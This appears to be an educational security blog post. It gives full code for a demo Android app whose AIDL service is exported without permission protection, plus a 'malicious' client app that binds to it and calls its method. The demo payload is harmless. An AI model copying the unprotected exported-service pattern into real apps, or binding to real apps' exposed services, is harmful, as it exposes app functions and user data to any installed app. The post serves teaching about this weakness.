Android Exposed Service Exploit

-

Android Application Service Code(Application 1):

------------------------------------------------------------------------------------------------------------
Details
------------------------------------------------------------------------------------------------------------
Package Name: com.example_service
Class Name: Server_Service
AIDL Interface Name: service_interface
------------------------------------------------------------------------------------------------------------
Code: Server_Service.java
------------------------------------------------------------------------------------------------------------
package com.example_service;
import android.app.Service;
import android.content.Intent;
import android.os.IBinder;
import android.os.RemoteException;

public class Server_Service extends Service {
    public Server_Service() {
    }
    //Create new stub and write implementation for all the function declared in the AIDL file
    protected service_interface.Stub binder=new service_interface.Stub() {
        @Override
        public String printname(String name) throws RemoteException {
            return "Hello"+name;
        }
    };
    @Override
    public IBinder onBind(Intent intent) {
        // TODO: Return the created binder object to the client who is binding to this service
        return binder;
    }
}
------------------------------------------------------------------------------------------------------------
Code: service_interface.aidl
------------------------------------------------------------------------------------------------------------
package com.example_service;

// Declare any non-default types here with import statements

interface service_interface {
    /**
     * Demonstrates some basic types that you can use as parameters
     * and return values in AIDL.
     */
    String printname(String name);
}
------------------------------------------------------------------------------------------------------------
Code: AndroidManifest.xml
------------------------------------------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example_service">

    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <service
            android:name=".Server_Service"
            android:enabled="true"
            android:exported="true"></service>
    </application>
</manifest>
------------------------------------------------------------------------------------------------------------



Malicious Application Exploiting Service(Application 2):

------------------------------------------------------------------------------------------------------------
Details
------------------------------------------------------------------------------------------------------------
Package Name: com.example_service.Service_Client
Class Name: MainActivity
AIDL Interface Name: service_interface
------------------------------------------------------------------------------------------------------------
Code: MainActivity.java
------------------------------------------------------------------------------------------------------------
package com.example_service.Service_Client;

import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.ServiceConnection;
import android.os.IBinder;
import android.os.RemoteException;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Toast;
import com.example_service.service_interface;

public class MainActivity extends AppCompatActivity {
    service_interface stub_interface;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        if (stub_interface==null){
            Intent it=new Intent();
            it.setClassName("com.example_service","com.example_service.Server_Service");
            bindService(it,connection, Context.BIND_AUTO_CREATE);
        }
    }
    public void exploit(View v) throws RemoteException {
        //Call the method which is implemented in Server_Service and get the result
    String attack=stub_interface.printname(" Attacker");
        Toast.makeText(getApplicationContext(),attack,Toast.LENGTH_SHORT).show();

    }
    protected ServiceConnection connection=new ServiceConnection() {
        @Override
        public void onServiceConnected(ComponentName componentName, IBinder iBinder) {
            //Receive the Object which is return by the Sever_Service on Bind Function
            stub_interface=service_interface.Stub.asInterface(iBinder);
            Toast.makeText(getApplicationContext(),"Service Connected",Toast.LENGTH_SHORT).show();
        }

        @Override
        public void onServiceDisconnected(ComponentName componentName) {

        }
    };
}

------------------------------------------------------------------------------------------------------------
Code: service_interface.aidl
------------------------------------------------------------------------------------------------------------
// service_interface.aidl
package com.example_service;

// Declare any non-default types here with import statements

interface service_interface {
    /**
     * Demonstrates some basic types that you can use as parameters
     * and return values in AIDL.
     */
    String printname(String name);
}
------------------------------------------------------------------------------------------------------------
Code: AndroidManifest.xml
------------------------------------------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example_service.Service_Client">

    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>

</manifest>
------------------------------------------------------------------------------------------------------------
Code: activity_main.xml
------------------------------------------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<android.support.constraint.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:app="http://schemas.android.com/apk/res-auto"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    tools:context=".MainActivity">

    <Button
        android:id="@+id/button"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:onClick="exploit"
        android:text="Exloit"
        tools:layout_editor_absoluteX="116dp"
        tools:layout_editor_absoluteY="160dp" />
</android.support.constraint.ConstraintLayout>

Source Code Download

Comments

  1. zomro lion22 October 2022 at 01:46

    Great man! You have really done the hard working on this post
    JTAG

    ReplyDelete

Post a Comment

Popular posts from this blog

JTAG PIN Identification

-
Image
My Setup Parrot Linux Arduino UNO Broadlink RM Mini  Software Arduino IDE JTAGEnum ( https://github.com/cyphunk/JTAGenum ) JTAG PINS to be Identified TCK   - Test Clock TMS  - Test Mode  TDI   - Test Data IN TDO  - Test Data Out GND  - Ground Hardware Connection Set up Connect Laptop and Arduino (USB cable) Arduino Digital PIN (any 5 pins) to RM Mini (5 pins) [Except 1 - VCC and 1 - GND] Note: If you are using JTAGENUM, the JTAGenum sketch uses the DIGITAL PIN from 2 to 11. Refer the line number 72(ino file) Software Connection Set up Download the INO sketch from the github Open the Arduino IDE and Load the downloaded JTAGEnum sketch Choose the correct Serial Port and Board Compile and Upload the sketch Open the Serial Monitor Set the correct baud rate Enter the command to scan ("s") Arduino PIN Layout Digital PIN 2(Black) Digital PIN 3(White) Digital PIN 4(Grey)
Read more
-
Image
Rubber Ducky - Arduino UNO Configuration for Arduino UNO Board: Download and install the Latest version of Arduino ( Recommended : Linux/Mac) Download Boot-loader Sketch(INO) from reference URL Open the INO file in the Arduino IDE Connect a Plain(no other wire connection) Arduino UNO to Laptop via USB cable In Arduino IDE, Select Tools->Board->Arduino/Genuino UNO In Arduino IDE, Select Tools->Port->ttyACM0 [Yours could be different. Use dmesg command to identify] Verify and Upload the Code Wait for the message “Upload Done” and Disconnect the USB cable  Make the cable connection as per the below screenshot attached Connect the USB cable again back to laptop and the boot loader will install by itself Wait for 1 to 2 min till the boot-loader get installed Disconnect USB cable from the laptop and disconnect all the jump wire and make the board plain Configuration for Arduino IDE: Connect the Board to laptop via USB cable Navigate File->Pref
Read more

CWE vs CVE

-
CWE: The Common Weakness Enumeration (CWE) is a formal list of software weakness types created to Serve as a common language for describing software security weaknesses in architecture, design, or code.  Reference: http://cwe.mitre.org/about/index.html   CVE: CVE is a list of information security vulnerabilities and exposures that aims to provide common names for publicly known problems. Reference: http://cve.mitre.org/about/terminology.html http://cve.mitre.org/about/index.html Difference (CWE vs CVE): Software vulnerability is a collection of one or more weaknesses that contain the possible way for an attacker to perform unintended behavior. So a weakness is a patterns or behaviors, a group of weakness or a single weakness may help to perform unintended behavior. In other word, When the weakness can be used by an attacker against the software then that's a vulnerability. For example , If an address parameter in register page is not properly validated
Read more